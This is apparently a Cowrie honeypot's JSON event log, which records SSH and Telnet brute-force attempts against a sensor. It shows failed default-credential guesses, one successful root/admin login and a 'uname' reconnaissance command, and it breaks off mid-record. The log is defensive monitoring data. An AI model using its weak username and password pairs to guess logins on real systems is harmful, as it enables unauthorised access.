{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:32:34.349485Z","src_ip":"217.154.1.158","session":"d51148ac43fb"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar123","message":"login attempt [sonar/sonar123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:32:34.393656Z","src_ip":"217.154.1.158","session":"d51148ac43fb"}
{"eventid":"cowrie.session.connect","src_ip":"58.71.205.251","src_port":42292,"dst_ip":"1.2.3.4","dst_port":23,"session":"ae121ac6f431","protocol":"telnet","message":"New connection: 58.71.205.251:42292 (1.2.3.4:23) [session: ae121ac6f431]","sensor":"my-vps","timestamp":"2025-08-26T19:32:35.118973Z"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:32:35.412226Z","src_ip":"217.154.1.158","session":"d51148ac43fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43234,"dst_ip":"1.2.3.4","dst_port":23,"session":"985906f2efe1","protocol":"telnet","message":"New connection: 212.227.235.229:43234 (1.2.3.4:23) [session: 985906f2efe1]","sensor":"my-vps","timestamp":"2025-08-26T19:32:36.049706Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58672,"dst_ip":"1.2.3.4","dst_port":23,"session":"9678821608a2","protocol":"telnet","message":"New connection: 212.227.235.229:58672 (1.2.3.4:23) [session: 9678821608a2]","sensor":"my-vps","timestamp":"2025-08-26T19:32:38.126646Z"}
{"eventid":"cowrie.session.closed","duration":3.0033223628997803,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:32:39.052948Z","src_ip":"212.227.235.229","session":"985906f2efe1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52996,"dst_ip":"1.2.3.4","dst_port":23,"session":"30835f2d51c2","protocol":"telnet","message":"New connection: 212.227.235.229:52996 (1.2.3.4:23) [session: 30835f2d51c2]","sensor":"my-vps","timestamp":"2025-08-26T19:32:42.261771Z"}
{"eventid":"cowrie.session.closed","duration":12.126513004302979,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:32:47.189972Z","src_ip":"58.71.205.251","session":"ae121ac6f431"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":36020,"dst_ip":"1.2.3.4","dst_port":22,"session":"9df22f9af344","protocol":"ssh","message":"New connection: 217.154.1.158:36020 (1.2.3.4:22) [session: 9df22f9af344]","sensor":"my-vps","timestamp":"2025-08-26T19:32:51.832369Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:32:51.833086Z","src_ip":"217.154.1.158","session":"9df22f9af344"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:32:51.847622Z","src_ip":"217.154.1.158","session":"9df22f9af344"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123","message":"login attempt [app/app123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:32:51.892499Z","src_ip":"217.154.1.158","session":"9df22f9af344"}
{"eventid":"cowrie.session.closed","duration":10.069804668426514,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:32:52.331472Z","src_ip":"212.227.235.229","session":"30835f2d51c2"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:32:52.908410Z","src_ip":"217.154.1.158","session":"9df22f9af344"}
{"eventid":"cowrie.session.closed","duration":15.619285583496094,"message":"Connection lost after 15 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:32:53.745858Z","src_ip":"212.227.235.229","session":"9678821608a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52642,"dst_ip":"1.2.3.4","dst_port":23,"session":"5ee521a966d3","protocol":"telnet","message":"New connection: 212.227.235.229:52642 (1.2.3.4:23) [session: 5ee521a966d3]","sensor":"my-vps","timestamp":"2025-08-26T19:32:57.684228Z"}
{"eventid":"cowrie.session.closed","duration":3.0598437786102295,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:33:00.743990Z","src_ip":"212.227.235.229","session":"5ee521a966d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56942,"dst_ip":"1.2.3.4","dst_port":23,"session":"21e73c0c1f1f","protocol":"telnet","message":"New connection: 212.227.235.229:56942 (1.2.3.4:23) [session: 21e73c0c1f1f]","sensor":"my-vps","timestamp":"2025-08-26T19:33:04.302910Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":44558,"dst_ip":"1.2.3.4","dst_port":22,"session":"bccad1a3a1c5","protocol":"ssh","message":"New connection: 217.154.1.158:44558 (1.2.3.4:22) [session: bccad1a3a1c5]","sensor":"my-vps","timestamp":"2025-08-26T19:33:09.327700Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:33:09.329571Z","src_ip":"217.154.1.158","session":"bccad1a3a1c5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:33:09.343897Z","src_ip":"217.154.1.158","session":"bccad1a3a1c5"}
{"eventid":"cowrie.login.failed","username":"tools","password":"tools","message":"login attempt [tools/tools] failed","sensor":"my-vps","timestamp":"2025-08-26T19:33:09.388375Z","src_ip":"217.154.1.158","session":"bccad1a3a1c5"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:33:10.404908Z","src_ip":"217.154.1.158","session":"bccad1a3a1c5"}
{"eventid":"cowrie.session.closed","duration":10.269673109054565,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:33:14.572511Z","src_ip":"212.227.235.229","session":"21e73c0c1f1f"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":52636,"dst_ip":"1.2.3.4","dst_port":22,"session":"732299e1306f","protocol":"ssh","message":"New connection: 217.154.1.158:52636 (1.2.3.4:22) [session: 732299e1306f]","sensor":"my-vps","timestamp":"2025-08-26T19:33:26.752210Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:33:26.752844Z","src_ip":"217.154.1.158","session":"732299e1306f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:33:26.767347Z","src_ip":"217.154.1.158","session":"732299e1306f"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse123","message":"login attempt [lighthouse/lighthouse123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:33:26.810736Z","src_ip":"217.154.1.158","session":"732299e1306f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:33:27.828667Z","src_ip":"217.154.1.158","session":"732299e1306f"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":47698,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a42a574958f","protocol":"ssh","message":"New connection: 217.154.1.158:47698 (1.2.3.4:22) [session: 9a42a574958f]","sensor":"my-vps","timestamp":"2025-08-26T19:33:44.153609Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:33:44.154614Z","src_ip":"217.154.1.158","session":"9a42a574958f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:33:44.168875Z","src_ip":"217.154.1.158","session":"9a42a574958f"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql123","message":"login attempt [mysql/mysql123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:33:44.213525Z","src_ip":"217.154.1.158","session":"9a42a574958f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:33:45.230446Z","src_ip":"217.154.1.158","session":"9a42a574958f"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":38498,"dst_ip":"1.2.3.4","dst_port":22,"session":"d772ddd0bef7","protocol":"ssh","message":"New connection: 217.154.1.158:38498 (1.2.3.4:22) [session: d772ddd0bef7]","sensor":"my-vps","timestamp":"2025-08-26T19:34:01.587422Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:34:01.588583Z","src_ip":"217.154.1.158","session":"d772ddd0bef7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:34:01.601730Z","src_ip":"217.154.1.158","session":"d772ddd0bef7"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:34:01.656681Z","src_ip":"217.154.1.158","session":"d772ddd0bef7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:34:01.706926Z","src_ip":"217.154.1.158","session":"d772ddd0bef7"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:34:01.707815Z","src_ip":"217.154.1.158","session":"d772ddd0bef7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:34:01.723173Z","src_ip":"217.154.1.158","session":"d772ddd0bef7"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:34:01.724326Z","src_ip":"217.154.1.158","session":"d772ddd0bef7"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":44258,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9f9eb5ffde6","protocol":"ssh","message":"New connection: 217.154.1.158:44258 (1.2.3.4:22) [session: e9f9eb5ffde6]","sensor":"my-vps","timestamp":"2025-08-26T19:34:19.175225Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:34:19.176577Z","src_ip":"217.154.1.158","session":"e9f9eb5ffde6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:34:19.191737Z","src_ip":"217.154.1.158","session":"e9f9eb5ffde6"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"gpadmin","message":"login attempt [gpadmin/gpadmin] failed","sensor":"my-vps","timestamp":"2025-08-26T19:34:19.240393Z","src_ip":"217.154.1.158","session":"e9f9eb5ffde6"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:34:20.257151Z","src_ip":"217.154.1.158","session":"e9f9eb5ffde6"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":52478,"dst_ip":"1.2.3.4","dst_port":22,"session":"56ea9ba266b9","protocol":"ssh","message":"New connection: 217.154.1.158:52478 (1.2.3.4:22) [session: 56ea9ba266b9]","sensor":"my-vps","timestamp":"2025-08-26T19:34:36.586727Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:34:36.587700Z","src_ip":"217.154.1.158","session":"56ea9ba266b9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:34:36.601806Z","src_ip":"217.154.1.158","session":"56ea9ba266b9"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"qwe123","message":"login attempt [oracle/qwe123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:34:36.645965Z","src_ip":"217.154.1.158","session":"56ea9ba266b9"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:34:37.663521Z","src_ip":"217.154.1.158","session":"56ea9ba266b9"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":49330,"dst_ip":"1.2.3.4","dst_port":22,"session":"06fa3b06d8e6","protocol":"ssh","message":"New connection: 45.88.8.215:49330 (1.2.3.4:22) [session: 06fa3b06d8e6]","sensor":"my-vps","timestamp":"2025-08-26T19:34:46.260267Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45019,"dst_ip":"1.2.3.4","dst_port":23,"session":"3f73a25e84cc","protocol":"telnet","message":"New connection: 212.227.125.160:45019 (1.2.3.4:23) [session: 3f73a25e84cc]","sensor":"my-vps","timestamp":"2025-08-26T19:34:46.672953Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:34:46.695784Z","src_ip":"45.88.8.215","session":"06fa3b06d8e6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecds